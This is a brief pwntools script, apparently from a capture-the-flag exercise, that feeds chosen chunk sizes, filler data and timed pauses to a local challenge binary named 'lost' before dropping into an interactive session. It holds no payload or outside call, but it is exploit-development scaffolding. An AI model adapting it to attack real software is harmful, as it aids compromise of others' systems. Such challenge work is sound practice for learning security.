from pwn import *
import time
s=process("./lost")
print s.recvuntil("Enter choice >> ")
s.send("1\n")
print s.recvuntil("How many chunks at a time (1/2) ? ")
s.send("2\n")
print s.recvuntil("Enter Size 1: ")
s.send("50\n")
sleep(4)
print s.recvuntil("Enter Size 2: ")
s.send("2000\n")
sleep(4)
print s.recvuntil("Enter Size 2: ")
s.send("3000\n")
s.send("3000\n")

print s.recvuntil("Enter Data 1: ")

s.send("helloworld!\n")
s.send("\n")
print s.recvuntil("Data entered")
s.send("\n")
print s.recvuntil("Enter Size 2: ")
s.send("50\n")
print s.recvuntil("Enter Author name :")
s.send("heeyeon\n")
print s.recvuntil("Enter Data 2: ")
s.send("happy\n")
print s.recvuntil("Enter choice >> ")
s.send("2\n")
raw_input()
s.interactive()
s.close()